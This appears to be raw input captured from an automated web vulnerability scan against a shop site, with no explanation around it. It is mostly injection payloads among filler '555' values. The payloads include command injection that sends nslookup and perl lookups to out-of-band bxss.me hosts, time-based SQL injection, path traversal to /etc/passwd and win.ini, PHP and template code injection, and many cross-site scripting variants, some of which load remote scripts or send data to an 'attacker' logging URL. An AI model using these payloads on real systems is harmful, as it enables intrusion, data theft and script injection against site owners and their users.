$(nslookup hitqpsbbmcshaa6218.bxss.me||perl -e "gethostbyname('hitqpsbbmcshaa6218.bxss.me')")
../../../../../../../../../../../../../../windows/win.ini
555
bcc:074625.478-205063.478.ed25d.19285.2@bxss.me
555
555
to@example.com>
bcc:074625.478-205064.478.ed25d.19285.2@bxss.me
&nslookup hitndwlyowvhz81ff0.bxss.me&'\"`0&nslookup hitndwlyowvhz81ff0.bxss.me&`'
file:///etc/passwd
-1; waitfor delay '0:0:15' --
555
&(nslookup hitfclmwtyxotb85e7.bxss.me||perl -e "gethostbyname('hitfclmwtyxotb85e7.bxss.me')")&'\"`0&(nslookup hitfclmwtyxotb85e7.bxss.me||perl -e "gethostbyname('hitfclmwtyxotb85e7.bxss.me')")&`'
555<esi:include src="http://bxss.me/rpb.png"/>
../555
-1); waitfor delay '0:0:15' --
|(nslookup hitojfygabymc95c6c.bxss.me||perl -e "gethostbyname('hitojfygabymc95c6c.bxss.me')")
555
555
555
${10000248+9999422}
-1)); waitfor delay '0:0:15' --
`(nslookup hitzhjlntggmx063fb.bxss.me||perl -e "gethostbyname('hitzhjlntggmx063fb.bxss.me')")`
555
555
555
555
;(nslookup hitxhccmjdven0fa55.bxss.me||perl -e "gethostbyname('hitxhccmjdven0fa55.bxss.me')")|(nslookup hitxhccmjdven0fa55.bxss.me||perl -e "gethostbyname('hitxhccmjdven0fa55.bxss.me')")&(nslookup hitxhccmjdven0fa55.bxss.me||perl -e "gethostbyname('hitxhccmjdven0fa55.bxss.me')")
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
1 waitfor delay '0:0:15' --
555
555&n963902=v913103
555
555
Http://bxss.me/t/fit.txt
)
555
http://bxss.me/t/fit.txt?.jpg
!(()&&!|*|*|
555
555
^(#$!@#$)(()))******
555
/etc/shells
KdDsk5Aa'; waitfor delay '0:0:15' --
555
555
'"()
c:/windows/win.ini
555
555
555
555
'.gethostbyname(lc('hites'.'ieeqclkif7997.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(68).chr(110).chr(77).'
pdCFLT27'); waitfor delay '0:0:15' --
bxss.me
555
555
".gethostbyname(lc("hitxf"."munbceuwa18d9.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(70).chr(105).chr(80)."
555
555
555'&&sleep(27*1000)*qcajoo&&'
555
555
CgY1ABPz')); waitfor delay '0:0:15' --
555"&&sleep(27*1000)*xizkkg&&"
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555'||sleep(27*1000)*gosdsw||'
-5 OR 396=(SELECT 396 FROM PG_SLEEP(15))--
555
';print(md5(31337));$a='
555"||sleep(27*1000)*oywlel||"
-5) OR 680=(SELECT 680 FROM PG_SLEEP(15))--
HttP://bxss.me/t/xss.html?%00
555
";print(md5(31337));$a="
"+"A".concat(70-3).concat(22*4).concat(112).concat(66).concat(99).concat(89)+(require"socket"
Socket.gethostbyname("hitgc"+"eyklkspf342ca.bxss.me.")[3].to_s)+"
bxss.me/t/xss.html?%00
555
555
nopcommerce-new-release
-1)) OR 809=(SELECT 809 FROM PG_SLEEP(15))--
'+'A'.concat(70-3).concat(22*4).concat(117).concat(71).concat(119).concat(67)+(require'socket'
Socket.gethostbyname('hitwf'+'ysllafjca05f2.bxss.me.')[3].to_s)+'
555
555
${@print(md5(31337))}
555
555
555
${@print(md5(31337))}\
nopcommerce-new-release/.
555
555
FU44UpMU' OR 712=(SELECT 712 FROM PG_SLEEP(15))--
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
oUXvmOQc') OR 836=(SELECT 836 FROM PG_SLEEP(15))--
555
555
555
xfs.bxss.me
555
555
igSyUKRT')) OR 511=(SELECT 511 FROM PG_SLEEP(15))--
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
<!--
1'"
555'"()&%<zzz><ScRiPt >ghsC(9215)</ScRiPt>
555
555
555
555
@@qTvyi
'"()&%<zzz><ScRiPt >ghsC(9939)</ScRiPt>
555
555
555
555
555
5559903742
555
555
555
555
555
555
555
555
555
bfg9837<s1﹥s2ʺs3ʹhjl9837
555
bfgx5799%C0%BEz1%C0%BCz2a%90bcxhjl5799
<%={{={@{#{${dfb}}%>
555
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >ghsC(9510)</ScRiPt>
555
555<W1OD5V>5XNOK[!+!]</W1OD5V>
555<script>ghsC(9333)</script>
555
555<ScR<ScRiPt>IpT>ghsC(9929)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>ghsC(9934)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9338></ScRiPt>
555
555
555
555<isindex type=image src=1 onerror=ghsC(9843)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9636'>
555<body onload=ghsC(9106)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=ghsC(9701)>
555<img src=xyz OnErRor=ghsC(9776)>
555<img/src=">" onerror=alert(9237)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%67%68%73%43%289329%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\ghsC(9972)\u003C/sCripT\u003E
555<ScRiPt>ghsC(9373)</sCripT>
%F6<img zzz onmouseover=ghsC(95011) //%F6>
555<input autofocus onfocus=ghsC(9697)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(ghsC(9349))}
5558I3n5
<ScRiPt >ghsC(9631)</ScRiPt>
555<WX2ULS>2OGYN[!+!]</WX2ULS>
555<ifRAme sRc=9395.com></IfRamE>
555<aPuM7j5 x=9490>
555<img sRc='http://attacker-9609/log.php?
555<aqqi0pH<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >6RXv(9511)</ScRiPt>
555
-1 OR 2+261-261-1=0+0+0+1 --
555
response.write(9872760*9834887)
-1 OR 2+597-597-1=0+0+0+1
'+response.write(9872760*9834887)+'
echo tzojpi$()\ wapcra\nz^xyu||a #' &echo tzojpi$()\ wapcra\nz^xyu||a #|" &echo tzojpi$()\ wapcra\nz^xyu||a #
"+response.write(9872760*9834887)+"
555
-1' OR 2+784-784-1=0+0+0+1 --
555
&echo zjtxzn$()\ mqlxwd\nz^xyu||a #' &echo zjtxzn$()\ mqlxwd\nz^xyu||a #|" &echo zjtxzn$()\ mqlxwd\nz^xyu||a #
/../../../../../../../../../../windows/system32/BITSADMIN.exe
'"()&%<zzz><ScRiPt >6RXv(9758)</ScRiPt>
555
|echo vjotsj$()\ xeqyvo\nz^xyu||a #' |echo vjotsj$()\ xeqyvo\nz^xyu||a #|" |echo vjotsj$()\ xeqyvo\nz^xyu||a #
-1' OR 2+705-705-1=0+0+0+1 or 'tFe7iqSM'='
555
555
-1" OR 2+511-511-1=0+0+0+1 --
(nslookup hittnegchlxpa6cd78.bxss.me||perl -e "gethostbyname('hittnegchlxpa6cd78.bxss.me')")
555
555
555
$(nslookup hitblenqyobma34e40.bxss.me||perl -e "gethostbyname('hitblenqyobma34e40.bxss.me')")
555
&nslookup hittvdfmoamku1a3e2.bxss.me&'\"`0&nslookup hittvdfmoamku1a3e2.bxss.me&`'
5559765755
555
8tLyI5vq
&(nslookup hitcwteomhkyj336f7.bxss.me||perl -e "gethostbyname('hitcwteomhkyj336f7.bxss.me')")&'\"`0&(nslookup hitcwteomhkyj336f7.bxss.me||perl -e "gethostbyname('hitcwteomhkyj336f7.bxss.me')")&`'
555
|(nslookup hitcgaksppcave49c8.bxss.me||perl -e "gethostbyname('hitcgaksppcave49c8.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
if(now()=sysdate(),sleep(15),0)
`(nslookup hitxlrsuzkrqa2ecaf.bxss.me||perl -e "gethostbyname('hitxlrsuzkrqa2ecaf.bxss.me')")`
555
;(nslookup hitsifwvydesi4d904.bxss.me||perl -e "gethostbyname('hitsifwvydesi4d904.bxss.me')")|(nslookup hitsifwvydesi4d904.bxss.me||perl -e "gethostbyname('hitsifwvydesi4d904.bxss.me')")&(nslookup hitsifwvydesi4d904.bxss.me||perl -e "gethostbyname('hitsifwvydesi4d904.bxss.me')")
555
555<esi:include src="http://bxss.me/rpb.png"/>
../../../../../../../../../../../../../../windows/win.ini
${9999096+9999136}
555
bcc:074625.478-212448.478.ed25d.19285.2@bxss.me
file:///etc/passwd
555
555
to@example.com>
bcc:074625.478-212455.478.ed25d.19285.2@bxss.me
555
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
../555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
555
555
)
555&n955914=v904410
Http://bxss.me/t/fit.txt
555
555
!(()&&!|*|*|
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
^(#$!@#$)(()))******
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
'"()
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
/etc/shells
555
555
555
555
555
555
555
555
-1; waitfor delay '0:0:15' --
c:/windows/win.ini
'.gethostbyname(lc('hitgj'.'qtlnegdj305b2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(84).chr(104).chr(76).'
bxss.me
".gethostbyname(lc("hitqy"."miulqfkse63c7.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(65).chr(104).chr(70)."
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555'&&sleep(27*1000)*apyene&&'
555
555"&&sleep(27*1000)*atyymi&&"
';print(md5(31337));$a='
555
555'||sleep(27*1000)*hfrqgd||'
555
";print(md5(31337));$a="
555"||sleep(27*1000)*ayzijf||"
-1); waitfor delay '0:0:15' --
${@print(md5(31337))}
555
${@print(md5(31337))}\
555
"+"A".concat(70-3).concat(22*4).concat(111).concat(67).concat(120).concat(72)+(require"socket"
Socket.gethostbyname("hiteg"+"fnkcehtl30d10.bxss.me.")[3].to_s)+"
-1)); waitfor delay '0:0:15' --
'.print(md5(31337)).'
nopcommerce-new-release
HttP://bxss.me/t/xss.html?%00
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(103).concat(90).concat(120).concat(72)+(require'socket'
Socket.gethostbyname('hitla'+'csaktdxs269a0.bxss.me.')[3].to_s)+'
555
bxss.me/t/xss.html?%00
nopcommerce-new-release/.
555
555
555
555
1 waitfor delay '0:0:15' --
555
555
FkBpd3AD'; waitfor delay '0:0:15' --
xfs.bxss.me
555
555
555
555
555
555
555
555
'"
555
CPqFtfKi'); waitfor delay '0:0:15' --
<!--
555
555
4936C6tF')); waitfor delay '0:0:15' --
555
555'"()&%<zzz><ScRiPt >EHFb(9706)</ScRiPt>
555
555
-5 OR 543=(SELECT 543 FROM PG_SLEEP(15))--
555
'"()&%<zzz><ScRiPt >EHFb(9169)</ScRiPt>
-5) OR 405=(SELECT 405 FROM PG_SLEEP(15))--
5559724529
-1)) OR 943=(SELECT 943 FROM PG_SLEEP(15))--
555
555
tVTII6DB' OR 872=(SELECT 872 FROM PG_SLEEP(15))--
555
1jLrVUNL') OR 535=(SELECT 535 FROM PG_SLEEP(15))--
555
bfg4629<s1﹥s2ʺs3ʹhjl4629
TwDLAkkE')) OR 806=(SELECT 806 FROM PG_SLEEP(15))--
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
bfgx4676%C0%BEz1%C0%BCz2a%90bcxhjl4676
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1'"
<%={{={@{#{${dfb}}%>
@@jNPSe
555
555
555
<th:t="${dfb}#foreach
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >EHFb(9467)</ScRiPt>
555
555<WDFL7B>EAZTY[!+!]</WDFL7B>
555
555<script>EHFb(9547)</script>
555
555<ScR<ScRiPt>IpT>EHFb(9139)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>EHFb(9528)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9919></ScRiPt>
555
555
555<isindex type=image src=1 onerror=EHFb(9809)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9908'>
555
555
555<body onload=EHFb(9316)>
555
555
555<img src=//xss.bxss.me/t/dot.gif onload=EHFb(9435)>
555<img src=xyz OnErRor=EHFb(9756)>
555<img/src=">" onerror=alert(9311)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%45%48%46%62%289678%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\EHFb(9689)\u003C/sCripT\u003E
555<ScRiPt>EHFb(9780)</sCripT>
%F6<img zzz onmouseover=EHFb(91191) //%F6>
555<input autofocus onfocus=EHFb(9572)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(EHFb(9891))}
5558Uss9
<ScRiPt >EHFb(9799)</ScRiPt>
555<WEBMUM>C8NYE[!+!]</WEBMUM>
555<ifRAme sRc=9196.com></IfRamE>
555<aq7pSir x=9932>
555<img sRc='http://attacker-9772/log.php?
555<atLooYu<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >g0Qm(9004)</ScRiPt>
'"()&%<zzz><ScRiPt >g0Qm(9739)</ScRiPt>
5559917501
bfg9088<s1﹥s2ʺs3ʹhjl9088
bfgx5383%C0%BEz1%C0%BCz2a%90bcxhjl5383
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >g0Qm(9915)</ScRiPt>
555<W0UUBI>SRUNF[!+!]</W0UUBI>
555<script>g0Qm(9905)</script>
555<ScR<ScRiPt>IpT>g0Qm(9109)</sCr<ScRiPt>IpT>
555<ScRiPt
>g0Qm(9449)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9595></ScRiPt>
555<isindex type=image src=1 onerror=g0Qm(9552)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9069'>
555<body onload=g0Qm(9398)>
555<img src=//xss.bxss.me/t/dot.gif onload=g0Qm(9887)>
555<img src=xyz OnErRor=g0Qm(9514)>
555<img/src=">" onerror=alert(9625)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%67%30%51%6D%289497%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\g0Qm(9149)\u003C/sCripT\u003E
555<ScRiPt>g0Qm(9093)</sCripT>
%F6<img zzz onmouseover=g0Qm(93731) //%F6>
555<input autofocus onfocus=g0Qm(9007)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(g0Qm(9903))}
5556wBSw
<ScRiPt >g0Qm(9998)</ScRiPt>
555<WHVPD6>IZIWX[!+!]</WHVPD6>
555<ifRAme sRc=9495.com></IfRamE>
555<apGaHn9 x=9980>
555<img sRc='http://attacker-9229/log.php?
555<aAwQSGx<